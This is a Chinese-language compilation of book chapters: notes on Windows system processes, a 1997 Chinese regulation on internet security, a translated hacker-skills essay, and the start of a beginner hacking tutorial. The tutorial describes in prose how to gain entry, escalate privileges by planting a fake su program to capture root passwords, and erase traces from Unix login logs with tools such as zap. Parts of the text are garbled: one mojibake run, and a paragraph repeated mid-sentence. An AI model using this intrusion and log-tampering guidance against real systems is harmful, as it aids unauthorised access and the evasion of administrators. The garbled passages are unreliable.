绍:Mdm.exe的主要工作是针对应用软件进行排错(Debug),说到这里,扯点题外话,如果你在系统见到fff开头的0字节文件,它们就是mdm.exe在排错过程中产生一些暂存文件,这些文件在操作系统进行关机时没有自动被清除,所以这些fff开头的怪文件里是一些后缀名为CHK的文件都是没有用的垃圾文件,可匀我馍境换岫韵低巢涣加跋臁6?X系统,只要系统中有Mdm.exe存在,就有可能产生以fff开头的怪文件。可以按下面的方法让系统停止运行Mdm.exe来彻底删除以fff开头的怪文件:首先按“Ctrl+Alt+Del”组合键,在弹出的“关闭程序”窗口中选中“Mdm”,按“结束任务”按钮来停止Mdm.exe在后台的运行,接着把Mdm.exe(在C:\Windows\System目录下)改名为Mdm.bak。运行msconfig程序,在启动页中取消对“Machine Debug Manager”的选择。这样可以不让Mdm.exe自启动,然后点击“确定”按钮,结束msconfig程序,并重新启动电脑。另外,如果你使用IE 5.X以上版本浏览器,建议禁用脚本调用(点击“工具→Internet选项→高级→禁用脚本调用”),这样就可以避免以fff开头的怪文件再次产生。 (12)[mmtask.tsk] 进程文件: mmtask or mmtask.tsk 进程名称: 多媒体支持进程 描 述: 这个Windows多媒体后台程序控制多媒体服务,例如MIDI。 介 绍:这是一个任务调度服务,负责用户事先决定在某一时间运行的任务的运行。 (13)[mprexe.exe] 进程文件: mprexe or mprexe.exe 进程名称: Windows路由进程 描 述: Windows路由进程包括向适当的网络部分发出网络请求。 介 绍:这是Windows的32位网络界面服务进程文件,网络客户端部件启动的核心。印象中“A-311木马(Trojan.A-311.104)”也会在内存中建立mprexe.exe进程,可以通过资源管理结束进程。 (14)[msgsrv32.exe] 进程文件: msgsrv32 or msgsrv32.exe 进程名称: Windows信使服务 描 述: Windows信使服务调用Windows驱动和程序管理在启动。 介 绍:msgsrv32.exe 一个管理信息窗口的应用程序,win9x下如果声卡或者显卡驱动程序配置不正确,会导致死机或者提示msgsrv32.exe 出错。 (15)[mstask.exe] 进程文件: mstask or mstask.exe 进程名称: Windows计划任务 描 述: Windows计划任务用于设定继承在什么时间或者什么日期备份或者运行。 介 绍:计划任务,它通过注册表自启动。因此,通过计划任务程序实现自启动的程序在系统信息中看不到它的文件名,一旦把它从注册表中删除或禁用,那么通过计划任务启动的程序全部不能自动运行。win9X下系统启动就会开启计划任务,可以通过双击计划任务图标-高级-终止计划任务来停止它自启动。另外,攻击者在攻击过程中,也经常用到计划任务,包括上传文件、提升权限、种植后门、清扫脚印等。 (16)[regsvc.exe] 进程文件: regsvc or regsvc.exe 进程名称: 远程注册表服务 描 述: 远程注册表服务用于访问在远程计算机的注册表。 (17)[rpcss.exe] 进程文件: rpcss or rpcss.exe 进程名称: RPC Portmapper 描 述: Windows 的RPC端口映射进程处理RPC调用(远程模块调用)然后把它们映射给指定的服务提供者。 介 绍:98它不是在装载解释器时或引导时启动,如果使用中有问题,可以直接在在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices添加"字符串值",定向到"C:\WINDOWS\SYSTEM\RPCSS"即可。 (18)[services.exe] 进程文件: services or services.exe 进程名称: Windows Service Controller 描 述: 管理Windows服务。 介 绍:大多数的系统核心模式进程是作为系统进程在运行。打开管理工具中的服务,可以看到有很多服务都是在调用%systemroot%\system32\service.exe (19)[smss.exe] 进程文件: smss or smss.exe 进程名称: Session Manager Subsystem 描 述: 该进程为会话管理子系统用以初始化系统变量,MS-DOS驱动名称类似LPT1以及COM,调用Win32壳子系统和运行在Windows登陆过程。 简 介:这是一个会话管理子系统,负责启动用户会话。这个进程是通过系统进程初始化的并且对许多活动的,包括已经正在运行的Winlogon,Win32(Csrss.exe)线程和设定的系统变量作出反映。在它启动这些进程后,它等待Winlogon或者Csrss结束。如果这些过程时正常的,系统就关掉了。如果发生了什么不可预料的事情,smss.exe就会让系统停止响应(就是挂起)。 (20)[snmp.exe] 进程文件: snmp or snmp.exe 进程名称: Microsoft SNMP Agent 描 述: Windows简单的网络协议代理(SNMP)用于监听和发送请求到适当的网络部分。 简 介:负责接收SNMP请求报文,根据要求发送响应报文并处理与WinsockAPI的接口。 (21)[spool32.exe] 进程文件: spool32 or spool32.exe 进程名称: Printer Spooler 描 述: Windows打印任务控制程序,用以打印机就绪。 (22)[spoolsv.exe] 进程文件: spoolsv or spoolsv.exe 进程名称: Printer Spooler Service 描 述: Windows打印任务控制程序,用以打印机就绪。 介 绍:缓冲(spooler)服务是管理缓冲池中的打印和传真作业。 (23)[stisvc.exe] 进程文件: stisvc or stisvc.exe 进程名称: Still Image Service 描 述: Still Image Service用于控制扫描仪和数码相机连接在Windows。 (24)[svchost.exe] 进程文件: svchost or svchost.exe 进程名称: Service Host Process 描 述: Service Host Process是一个标准的动态连接库主机处理服务. 介 绍:Svchost.exe文件对那些从动态连接库中运行的服务来说是一个普通的主机进程名。Svhost.exe文件定位在系统的%systemroot%\system32文件夹下。在启动的时候,Svchost.exe检查注册表中的位置来构建需要加载的服务列表。这就会使多个Svchost.exe在同一时间运行。每个Svchost.exe的回话期间都包含一组服务,以至于单独的服务必须依靠Svchost.exe怎样和在那里启动。这样就更加容易控制和查找错误。windows 2k一般有2个svchost进程,一个是RPCSS(Remote Procedure Call)服务进程,另外一个则是由很多服务共享的一个svchost.exe。而在windows XP中,则一般有4个以上的svchost.exe服务进程,windows 2003 server中则更多。 (25)[taskmon.exe] 进程文件: taskmon or taskmon.exe 进程名称: Windows Task Optimizer 描 述: windows任务优化器监视你使用某个程序的频率,并且通过加载那些经常使用的程序来整理优化硬盘。 介 绍:任务管理器,它的功能是监视程序的执行情况并随时报告。能够监测所有在任务栏中以窗口方式运行的程序,可打开和结束程序,还可直接调出关闭系统对话框。 (26)[tcpsvcs.exe] 进程文件: tcpsvcs or tcpsvcs.exe 进程名称: TCP/IP Services 描 述: TCP/IP Services Application支持透过TCP/IP连接局域网和Internet。 (27)[winlogon.exe] 进程文件: winlogon or winlogon.exe 进程名称: Windows Logon Process 描 述: Windows NT用户登陆程序。这个进程是管理用户登录和退出的。而且winlogon在用户按下CTRL+ALT+DEL时就激活了,显示安全对话框。 (28)[winmgmt.exe] 进程文件: winmgmt or winmgmt.exe 进程名称: Windows Management Service 描 述: Windows Management Service透过Windows Management Instrumentation data WMI)技术处理来自应用客户端的请求。 简 介:winmgmt是win2000客户端管理的核心组件。当客户端应用程序连接或当管理程序需要他本身的服务时这个进程初始化。WinMgmt.exe(CIM对象管理器)和知识库(Repository)是WMI两个主要构成部分,其中知识库是对象定义的数据库,它是存儲所有可管理静态数据的中心数据库,对象管理器负责处理知识库中对象的收集和操作并从WMI提供程序收集信息。WinMgmt.exe在Windows 2k/NT上作为一个服务运行,而在Windows 95/98上作为一个独立的exe程序运行。Windows 2k系统在某些计算机上出现的WMI错误可以通过安装Windows 2k SP2來修正。 (29)[system] 进程文件: system or system 进程名称: Windows System Process 描 述: Microsoft Windows系统进程。 介 绍:在任务管理器中会看到这项进程,属于正常系统进程。 系统进程就介绍到这里。 在Windows2k/XP中,以下进程是必须加载的: smss.exe、csrss.exe、winlogon.exe、services.exe、lsass.exe、svchost.exe(可以同时存在多个)、spoolsv.exe、explorer.exe、System Idle Process; 在Windows 9x中,一下进程是必须加载的: msgsrv32.exe、mprexe.exe、mmtask.tsk、kenrel32.dll。 第29章 计算机信息网络国际联网安全保护管理办法 (1997年12月11日国务院批准1997年12月30日公安部发布) 第一章 总则 第一条 为了加强对计算机信息网络国际联网的安全保护,维护公共秩序和社会稳定,根据《中华人民共和国计算机信息系统安全保护条例》、《中华人民共和国计算机信息网络国际联网管理暂行规定》和其他法律、行政法规的规定,制定本办法。 第二条 中华人民共和国境内的计算机信息网络国际联网安全保护管理,适用本办法。 第三条 公安部计算机管理监察机构负责计算机信息网络国际联网的安全保护管理工作。公安机关计算机管理监察机构应当保护计算机信息网络国际联网的公共安全,维护从事国际联网业务的单位和个人的合法权益和公众利益。 第四条 任何单位和个人不得利用国际联网危害国家安全、泄露国家秘密,不得侵犯国家的、社会的、集体的利益和公民的合法权益,不得从事违法犯罪活动。 第五条 任何单位和个人不得利用国际联网制作、复制、查阅和传播下列信息: (一)煽动抗拒、破坏宪法和法律、行政法规实施的; (二)煽动颠覆国家政权,推翻社会主义制度的; (三)煽动分裂国家、破坏国家统一的; (四)煽动民族仇恨、民族歧视,破坏民族团结的; (五)捏造或者歪曲事实,散布谣言,扰乱社会秩序的; (六)宣扬封建迷信、淫秽、色情、赌博、暴力、凶杀、恐怖,教唆犯罪的; (七)公然侮辱他人或者捏造事实诽谤他人的; (八)损害国家机关信誉的; (九)其他违反宪法和法律、行政法规的。 第六条 任何单位和个人不得从事下列危害计算机信息网络安全的活动: (一)未经允许,进入计算机信息网络或者使用计算机信息网络资源的; (二)未经允许,对计算机信息网络功能进行删除、修改或者增加的; (三)未经允许,对计算机信息网络中存储、处理或者传输的数据和应用程序进行删除、修改或者增加的; (四)故意制作、传播计算机病毒等破坏性程序的; (五)其他危害计算机信息网络安全的。 第七条 用户的通信自由和通信秘密受法律保护。任何单位和个人不得违反法律规定,利用国际联网侵犯用户的通信自由和通信秘密。 第二章 安全保护责任 第八条 从事国际联网业务的单位和个人应当接受公安机关的安全监督、检查和指导,如实向公安机关提供有关安全保护的信息、资料及数据文件,协助公安机关查处通过国际联网的计算机信息网络的违法犯罪行为。 第九条 国际出入口信道提供单位、互联单位的主管部门或者主管单位,应当依照法律和国家有关规定负责国际出入口信道、所属互联网络的安全保护管理工作。 第十条 互联单位、接入单位及使用计算机信息网络国际联网的法人和其他组织应当履行下列安全保护职责: (一)负责本网络的安全保护管理工作,建立健全安全保护管理制度; (二)落实安全保护技术措施,保障本网络的运行安全和信息安全; (三)负责对本网络用户的安全教育和培训; (四)对委托发布信息的单位和个人进行登记,并对所提供的信息内容按照本办法第五条进行审核; (五)建立计算机信息网络电子公告系统的用户登记和信息管理制度; (六)发现有本办法第四条、第五条、第六条、第七条所列情形之一的,应当保留有关原始记录,并在二十四小时内向当地公安机关报告; (七)按照国家有关规定,删除本网络中含有本办法第五条内容的地址、目录或者关闭服务器。 第十一条 用户在接入单位办理入网手续时,应当填写用户备案表。备案表由公安部监制。 第十二条 互联单位、接入单位、使用计算机信息网络国际联网的法人和其他组织(包括跨省、自治区、直辖市联网的单位和所属的分支机构),应当自网络正式联通之日起三十日内,到所在地的省、自治区、直辖市人民政府公安机关指定的受理机关办理备案手续。前款所列单位应当负责将接入本网络的接入单位和用户情况报当地公安机关备案,并及时报告本网络中接入单位和用户的变更情况。 第十三条 使用公用帐号的注册者应当加强对公用帐号的管理,建立帐号使用登记制度。用户帐号不得转借、转让。 第十四条 涉及国家事务、经济建设、国防建设、尖端科学技术等重要领域的单位办理备案手续时,应当出具其行政主管部门的审批证明。前款所列单位的计算机信息网络与国际联网,应当采取相应的安全保护措施。 第三章 安全监督 第十五条 省、自治区、直辖市公安厅(局),地(市)、县(市)公安局,应当有相应机构负责国际联网的安全保护管理工作。 第十六条 公安机关计算机管理监察机构应当掌握互联单位、接入单位和用户的备案情况,建立备案档案,进行备案统计,并按照国家有关规定逐级上报。 第十七条 公安机关计算机管理监察机构应当督促互联单位、接入单位及有关用户建立健全安全保护管理制度。监督、检查网络安全保护管理以及技术措施的落实情况。公安机关计算机管理监察机构在组织安全检查时,有关单位应当派人参加。公安机关计算机管理监察机构对安全检查发现的问题,应当提出改进意见,作出详细记录,存档备查。 第十八条 公安机关计算机管理监察机构发现含有本办法第五条所列内容的地址、目录或者服务器时,应当通知有关单位关闭或者删除。 第十九条 公安机关计算机管理监察机构应当负责追踪和查处通过计算机信息网络的违法行为和针对计算机信息网络的犯罪案件,对违反本办法第四条、第七条规定的违法犯罪行为,应当按照国家有关规定移送有关部门或者司法机关处理。 第四章 法律责任 第二十条 违反法律、行政法规,有本办法第五条、第六条所列行为之一的,由公安机关给予警告,有违法所得的,没收违法所得,对个人可以并处五千元以下的罚款,对单位可以并处一万五千元以下的罚款,情节严重的,并可以给予六个月以内停止联网、停机整顿的处罚,必要时可以建议原发证、审批机构吊销经营许可证或者取消联网资格;构成违反治安管理行为的,依照治安管理处罚条例的规定处罚;构成犯罪的,依法追究刑事责任。 第二十一条 有下列行为之一的,由公安机关责令限期改正,给予警告,有违法所得的,没收违法所得;在规定的限期内未改正的,对单位的主管负责人员和其他直接责任人员可以并处五千元以下的罚款,对单位可以并处一万五千元以下的罚款;情节严重的,并可以给予六个月以内的停止联网、停机整顿的处罚,必要时可以建议原发证、审批机构吊销经营许可证或者取消联网资格。 (一)未建立安全保护管理制度的; (二)未采取安全技术保护措施的; (三)未对网络用户进行安全教育和培训的; (四)未提供安全保护管理所需信息、资料及数据文件,或者所提供内容不真实的; (五)对委托其发布的信息内容未进行审核或者对委托单位和个人未进行登记的; (六)未建立电子公告系统的用户登记和信息管理制度的; (七)未按照国家有关规定,删除网络地址、目录或者关闭服务器的; (八)未建立公用帐号使用登记制度的; (九)转借、转让用户帐号的。 第二十二条 违反本办法第四条、第七条规定的,依照有关法律、法规予以处罚。 第二十三条 违反本办法第十一条、第十二条规定,不履行备案职责的,由公安机关给予警告或者停机整顿不超过六个月的处罚。 第五章 附则 第二十四条 与香港特别行政区和台湾、澳门地区联网的计算机信息网络的安全保护管理,参照本办法执行。 第二十五条 本办法自发布之日起施 第30章 *吸烟有害健康!请讲公德!请尊重他人生命权! *保护树木,山河披绿! 第三部分:高级篇 一个黑客的基本技能 1、黑客的精神态度是很重要的,但技术则更是重要。黑客的态度虽然是无可取代,随著新科技的发明和旧技术的取代,这些工具随时间在慢慢的改变。例如:以往总是会学会用机器码写程序,直到最近我们开始使用HTML。不过,在1996年末,当然,这是基础的hacking技能。在1997年,理所当然的,你必须学会C。 但,如果你只是学一种语言,那么你不能算是一位黑客,了不起只能算是一个programmer。除此,你还必须学会学会以独立于任何程序语言之上的概括性观念来思考一件程序设计上的问题。要成为一位真正的黑客,你必须要能在几天之内将manual内容和你目前己经知道的关连起学会一种新的语言。也就是说,你必会学还了C之外的东西,你至少还要会LISP或Perl(Java也正在努力的挤上这个名单; 译者注: 我很怀疑这份名单)。除了几个重要的hacking常用语言之外,这些语言提供你一些不同的程序设计途径,并且让你在好的方法中学习。 程序设计是一种复杂的技术,我没辨法在这提供完整的学习步骤。但是我能告诉你一些在书本上和课堂上所没有的东西(有很多,几乎全部最好的黑客们都是自习而来的)。(a) 读别人的程序码;(写程序,这两项是不错的方法。学习写程序就像在学习写一种良好的自然语言,最好的方法是去看一些专家们所写的东西,然后写一些你自己的东西,然后读更多,再写更多。然后一直持续,一直到你发展出一种属于自己的风格和特色。要找到好的程序码来看是很一件很困难的事,因为,对菜鸟黑客们而言,适于供他们阅读和努力的大型程序的source数量很少。但这事己有了戏剧性的变化了; 现在免费的供应的软件、程序设计工具和操作系统(大都公开提供 source,而且全都是由黑客们写成的)到处可看。进入下一个主题。 2、取得一个免费的 UNIX,并学习使用和维护。我先假设你己经有一部个人电脑或者是可以使用任何一部(现在的小孩子真幸福,可如此轻易的拥有 :-))。 取得黑客技巧的第一个步骤是取得一份Linux 或者一份免费的 BSD-Unix,并将它安装在自己的机器,并使之顺利的运作。没错,在这个世界上除了Unix之外,还有其它的操作系统。但是他们只提供bianry,你不能看到他们的程序码,你也不能修改他们。想要在DOS或Windows或MacOS开始hacking,无疑就是要你绑著枷锁跳舞一样。 除此之外,Unix是Internet上的操作系统。当你在不懂Unix的情况下学习使用Internet时,你没辨法在不懂Unix的情况下成为Internet的黑客。因为这个原故,现在的黑客文化还是很牢固的以Unix为中心。(这并不完全是正确的,而且有些活在旧时代的黑客甚至也不喜欢这种情形,但是Unix和Internet之间的共生共成己经到了牢不可破的地步,即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。) 因些,把Unix装起来吧! (我自己是喜欢Linux,但是还有其它的东东可用。) 学习它,让它运作起来,让它陪你努力精进。 用他向整个Internet喊话。看程序码,改程序。 有一天你成为一位高竿的黑客,你回头往后看时会发现,你得到比Microsoft操作系统所能提供的还要好的程序设计工具(包括 C,Lisp和 Perl)。而且得到快乐,并学到比共生共成己经到了牢不可破的地步,即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。) 因些,把Unix装起来吧! (我自己是喜欢Linux,但是还有其它的东东可用。) 学习它,让它运作起来,让它陪你努力精进。用他向整个Internet喊话。 看程序码,改程序。有一天你成为一位高竿的黑客,你回头往后看时会发现,你得到比Microsoft操作系统所能提供的还要好的程序设计工具(包括 C,Lisp和 Perl)。而且得到快乐,并 学到比你想像中的还要多的知识。关于学习Unix,在Loginataka有更多的资料。(http://www.ccil.org/~esr/faqs/loginataka。) 看一下Linux distribution的目录或 Linux CD,并把自己交付给它。 3、学习使用World Wide Web并学会写 HTML。 在黑客文化创造出来的东西,大多在他们的活动范围外被使用著,如,在工厂和辨公室或大学被漠漠的使用著。但Web是一个很大的例外,这个黑客眼中的大玩具甚至还被政客们接受,并巧巧的在改变这个世界。因此(还有很多好的理由),你必须学习Web。并不只是学习使用browser(这太容易了)而己,还要学会写HTML这个Web的标签语言。如果你不知道如何设计程序,写HTML也可以给一些习惯上的帮助。嗯!! 建立home page吧! 不过,有一个home page 并没任何特别之处能让你成为一位黑客。Web上到处都是home page,而且大部份都没什么重点,没什么内容的烂泥 -- 很好看的烂泥巴,但是看起来都一样,差不多。 4、至少学会以下的其中两种: 一、网站服务器程序ASP、PHP、CGI、jsP 我个人认为CGI是最难学的其中一种。 二、程序语言:C语言、C++、VB、JAVA、PERL、DELPHI、汇编语言 不过我认为C语言的通用性最好,可以跨平台(操作系统)使用。 还要试着自己写程序、开发软件等工作。 三、数据库管理软件:MYSQL、SQL、FOXPRO……等。 四、几种常用的操作系统:WIN98、WIN2000、WINNT、WINXP、UNIX、LINUX、要是能学到UNIX那是最好不过的了。最最基本的WIN2K、WINNT也要学会吧。 如果以上的你都会了,那么你已经是个高手了。 2楼 黑客初级技术讲解(上) 网络安全从其本质上来讲就是网络上的信息安全。从广义来说,凡是涉及到网络上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。确保网络系统的信息安全是网络安全的目标,信息安全包括两个方面:信息的存 储安全和信息的传输安全。信息的存储安全是指信息在静态存放状态下的安全,如是否会被非授权调用等。信息的传输安全是指信息在动态传输过程中安全。为了确保网络信息的传输安全,有以下几个问题:   (1)对网络上信息的监听   (2)对用户身份的仿冒   (3)对网络上信息的篡改   (4)对发出的信息予以否认   (5)对信息进行重发   对于一般的常用入侵方法主要有   1.口令入侵   所谓口令入侵,就是指用一些软件解开已经得到但被人加密的口令文档,不过许多黑客已大量采用一种可以绕开或屏蔽口令保护的程序来完成这项工作。对于那些可以解开或屏蔽口令保护的程序通常被称为“Crack”。由于这些软件的广为流传,使得入侵电脑网络系统有时变得相当简单,一般不需要很深入了解系统的内部结构,是初学者的好方法。   2.特洛伊木马术   说到特洛伊木马,只要知道这个故事的人就不难理解,它最典型的做法可能就是把一个能帮助黑客完成某一特定动作的程序依附在某一合法用户的正常程序中,这时合法用户的程序代码已被该变。一旦用户触发该程序,那么依附在内的黑客指令代码同时被激活,这些代码往往能完成黑客指定的任务。由于这种入侵法需要黑客有很好的编程经验,且要更改代码、要一定的权限,所以较难掌握。但正因为它的复杂性,一般的系统管理员很难发现。   3.监听法   这是一个很实用但风险也很大的黑客入侵方法,但还是有很多入侵系统的黑客采用此类方法,正所谓艺高人胆大。   网络节点或工作站之间的交流是通过信息流的转送得以实现,而当在一个没有集线器的网络中,数据的传输并没有指明特定的方向,这时每一个网络节点或工作站都是一个接口。这就好比某一节点说:“嗨!你们中有谁是我要发信息的工作站。”   此时,所有的系统接口都收到了这个信息,一旦某个工作站说:“嗨!那是我,请把数据传过来。”联接就马上完成。   目前有网络上流传着很多嗅探软件,利用这些软件就可以很简单的监听到数据,甚至就包含口令文件,有的服务在传输文件中直接使用明文传输,这也是非常危险的 4.E-mail技术   使用email加木马程序这是黑客经常使用的一种手段,而且非常奏效,一般的用户,甚至是网管,对网络安全的意识太过于淡薄,这就给很多黑客以可乘之机。   5.病毒技术   作为一个黑客,如此使用应该是一件可耻的事情,不过大家可以学习,毕竟也是一种攻击的办法,特殊时间,特殊地点完全可以使用。   6.隐藏技术   网络攻击的一般步骤及实例   攻击的准备阶段   首先需要说明的是,入侵者的来源有两种,一种是内部人员利用自己的工作机会和权限来获取不应该获取的权限而进行的攻击。另一种是外部人员入侵,包括远程入侵、网络节点接入入侵等。本节主要讨论远程攻击。   进行网络攻击是一件系统性很强的工作,其主要工作流程是:收集情报,远程攻击,远程登录,取得普通用户的权限,取得超级用户的权限,留下后门,清除日志。主要内容包括目标分析,文档获取,破解密码,日志清除等技术,下面分别介绍。   1.确定攻击的目的   攻击者在进行一次完整的攻击之前首先要确定攻击要达到什么样的目的,即给对方造成什么样的后果。常见的攻击目的有破坏型和入侵型两种。破坏型攻击指的只是破坏攻击目标,使其不能正常工作,而不能随意控制目标的系统的运行。要达到破坏型攻击的目的,主要的手段是拒绝服务攻击(Denial Of Service)。另一类常见的攻击目的是入侵攻击目标,这种攻击是要获得一定的权限来达到控制攻击目标的目的。应该说这种攻击比破坏型攻击更为普遍,威胁性也更大。因为黑客一旦获取攻击目标的管理员权限就可以对此服务器做任意动作,包括破坏性的攻击。此类攻击一般也是利用服务器操作系统、应用软件或者网络协议存在的漏洞进行的。当然还有另一种造成此种攻击的原因就是密码泄露,攻击者靠猜测或者穷举法来得到服务器用户的密码,然后就可以用和真正的管理员一样对服务器进行访问。   2.信息收集   除了确定攻击目的之外,攻击前的最主要工作就是收集尽量多的关于攻击目标的信息。这些信息主要包括目标的操作系统类型及版本,目标提供哪些服务,各服务器程序的类型与版本以及相关的社会信息。   要攻击一台机器,首先要确定它上面正在运行的操作系统是什么,因为对于不同类型的操作系统,其上的系统漏洞有很大区别,所以攻击的方法也完全不同,甚至同一种操作系统的不同版本的系统漏洞也是不一样的。要确定一台服务器的操作系统一般是靠经验,有些服务器的某些服务显示信息会泄露其操作系统。例如当我们通过TELNET连上一台机器时,如果显示   Unix(r)System V Release 4.0   login:   那么根据经验就可以确定这个机器上运行的操作系统为SUN OS 5.5或5.5.l。但这样确定操作系统类型是不准确的,因为有些网站管理员为了迷惑攻击者会故意更改显示信息,造成假象。 还有一种不是很有效的方法,诸如查询DNS的主机信息(不是很可靠)来看登记域名时的申请机器类型和操作系统类型,或者使用社会工程学的方法来获得,以及利用某些主机开放的SNMP的公共组来查询。   另外一种相对比较准确的方法是利用网络操作系统里的TCP/IP堆栈作为特殊的“指纹”来确定系统的真正身份。因为不同的操作系统在网络底层协议的各种实现细节上略有不同。可以通过远程向目标发送特殊的包,然后通过返回的包来确定操作系统类型。例如通过向目标机发送一个FIN的包(或者是任何没有ACK或SYN标记的包)到目标主机的一个开放的端口然后等待回应。许多系统如windows、 BSDI、 CISCO、 HP/UX和 IRIX会返回一个RESET。通过发送一个SYN包,它含有没有定义的TCP标记的TCP头。那么在Linux系统的回应包就会包含这个没有定义的标记,而在一些别的系统则会在收到SYN+BOGU包之后关闭连接。或是利用寻找初始化序列长度模板与特定的操作系统相匹配的方法。利用它可以对许多系统分类,如较早的Unix系统是64K长度,一些新的Unix系统的长度则是随机增长。还有就是检查返回包里包含的窗口长度,这项技术根据各个操作系统的不同的初始化窗口大小来唯一确定它们。利用这种技术实现的工具很多,比较著名的有NMAP、CHECKOS、QUESO等。   获知目标提供哪些服务及各服务daemon的类型、版本同样非常重要,因为已知的漏洞一般都是对某一服务的。这里说的提供服务就是指通常我们提到的喘口,例如一般TELNET在23端口,FTP在对21端口,WWW在80端口或8080端口,这只是一般情况,网站管理完全可以按自己的意愿修改服务所监听的端口号。在不同服务器上提供同一种服务的软件也可以是不同,我们管这种软件叫做daemon,例如同样是提供FTP服务,可以使用wuftp、proftp,ncftp等许多不同种类的daemon。确定daemon的类型版本也有助于黑客利用系统漏洞攻破网站。   另外需要获得的关于系统的信息就是一些与计算机本身没有关系的社会信息,例如网站所属公司的名称、规模,网络管理员的生活习惯、电话号码等。这些信息看起来与攻击一个网站没有关系,实际上很多黑客都是利用了这类信息攻破网站的。例如有些网站管理员用自己的电话号码做系统密码,如果掌握了该电话号码,就等于掌握了管理员权限进行信息收集可以用手工进行,也可以利用工具来完成,完成信息收集的工具叫做扫描器。用扫描器收集信息的优点是速度快,可以一次对多个目标进行扫描。   攻击的实施阶段   1.获得权限   当收集到足够的信息之后,攻击者就要开始实施攻击行动了。作为破坏性攻击,只需利用工具发动攻击即可。而作为入侵性攻击,往往要利用收集到的信息,找到其系统漏洞,然后利用该漏洞获取一定的权限。有时获得了一般用户的权限就足以达到修改主页等目的了,但作为一次完整的攻击是要获得系统最高权限的,这不仅是为了达到一定的目的,更重要的是证明攻击者的能力,这也符合黑客的追求。   能够被攻击者所利用的漏洞不仅包括系统软件设计上的安全漏洞,也包括由于管理配置不当而造成的漏洞。前不久,因特网上应用最普及的著名www服务器提供商Apache的主页被黑客攻破,其主页面上的 Powered by Apache图样(羽毛状的图画)被改成了Powered by Microsoft Backoffice的图样,那个攻击者就是利用了管理员对Webserver用数据库的一些不当配置而成功取得最高权限的。 黑客初级技术讲解(中)   当然大多数攻击成功的范例还是利用了系统软件本身的漏洞。造成软件漏洞的主要原因在于编制该软件的程序员缺乏安全意识。当攻击者对软件进行非正常的调用请求时造成缓冲区溢出或者对文件的非法访问。其中利用缓冲区溢出进行的攻击最为普遍,据统计80%以上成功的攻击都是利用了缓冲区溢出漏洞来获得非法权限的。关于缓冲区溢出在后面用专门章节来作详细解释。   无论作为一个黑客还是一个网络管理员,都需要掌握尽量多的系统漏洞。黑客需要用它来完成攻击,而管理员需要根据不同的漏洞来进行不同的防御措施。了解最新最多的漏洞信息,可以到诸如Rootshell(www.rootshell.com)、Packetstorm(packetstorm.securify.com)、Securityfocus(www.securityfocus.com)等网站去查找。   2.权限的扩大   系统漏洞分为远程漏洞和本地漏洞两种,远程漏洞是指黑客可以在别的机器上直接利用该漏洞进行攻击并获取一定的权限。这种漏洞的威胁性相当大,黑客的攻击一般都是从远程漏洞开始的。但是利用远程漏洞获取的不一定是最高权限,而往往只是一个普通用户的权限,这样常常没有办法做黑客们想要做的事。这时就需要配合本地漏洞来把获得的权限进行扩大,常常是扩大至系统的管理员权限。 只有获得了最高的管理员权限之后,才可以做诸如网络监听、打扫痕迹之类的事情。要完成权限的扩大,不但可以利用已获得的权限在系统上执行利用本地漏洞的程序,还可以放一些木马之类的欺骗程序来套取管理员密码,这种木马是放在本地套取最高权限用的,而不能进行远程控制。例如一个黑客已经在一台机器上获得了一个普通用户的账号和登录权限,那么他就可以在这台机器上放置一个假的su程序。一旦黑客放置了假su程序,当真正的合法用户登录时,运行了su,并输入了密码,这时root密码就会被记录下来,下次黑客再登录时就可以使用su变成root了。   攻击的善后工作   1.日志系统简介   如果攻击者完成攻击后就立刻离开系统而不做任何善后工作,那么他的行踪将很快被系统管理员发现,因为所有的网络操作系统一般都提供日志记录功能,会把系统上发生的动作记录下来。所以,为了自身的隐蔽性,黑客一般都会抹掉自己在日志中留下的痕迹。想要了解黑客抹掉痕迹的方法,首先要了解常见的操作系统的日志结构以及工作方式。Unix的日志文件通常放在下面这几个位置,根据操作系统的不同略有变化   /usr/adm——早期版本的Unix。   /Var/adm新一点的版本使用这个位置。   /Varflort一些版本的Solaris、 Linux BSD、 Free BSD使用这个位置。   /etc,大多数Unix版本把Utmp放在此处,一些Unix版本也把Wtmp放在这里,这也是Syslog.conf的位置。   下面的文件可能会根据你所在的目录不同而不同:   acct或pacct-一记录每个用户使用的命令记录。   accesslog主要用来服务器运行了NCSA HTTP服务器,这个记录文件会记录有什么站点连接过你的服务器。   aculo保存拨出去的Modems记录。   lastlog记录了最近的Login记录和每个用户的最初目的地,有时是最后不成功Login的记录。   loginlog一记录一些不正常的L0gin记录。   messages——记录输出到系统控制台的记录,另外的信息由Syslog来生成   security记录一些使用 UUCP系统企图进入限制范围的事例。   sulog记录使用su命令的记录。   utmp记录当前登录到系统中的所有用户,这个文件伴随着用户进入和离开系统而不断变化。   Utmpx,utmp的扩展。   wtmp记录用户登录和退出事件。   Syslog最重要的日志文件,使用syslogd守护程序来获得。   2.隐藏踪迹   攻击者在获得系统最高管理员权限之后就可以随意修改系统上的文件了(只对常规 Unix系统而言),包括日志文件,所以一般黑客想要隐藏自己的踪迹的话,就会对日志进行修改。最简单的方法当然就是删除日志文件了,但这样做虽然避免了系统管理员根据IP追踪到自己,但也明确无误地告诉了管理员,系统己经被人侵了。所以最常用的办法是只对日志文件中有关自己的那一部分做修改。关于修改方法的具体细节根据不同的操作系统有所区别,网络上有许多此类功能的程序,例如 zap、 wipe等,其主要做法就是清除 utmp、wtmp、Lastlog和 Pacct等日志文件中某一用户的信息,使得当使用w、who、last等命令查看日志文件时,隐藏掉此用户的信息。 管理员想要避免日志系统被黑客修改,应该采取一定的措施,例如用打印机实时记录网络日志信息。但这样做也有弊端,黑客一旦了解到你的做法就会不停地向日志里写入无用的信息,使得打印机不停地打印日志,直到所有的纸用光为止。所以比较好的避免日志被修改的办法是把所有日志文件发送到一台比较安全的主机上,即使用loghost。即使是这样也不能完全避免日志被修改的可能性,因为黑客既然能攻入这台主机,也很可能攻入loghost。   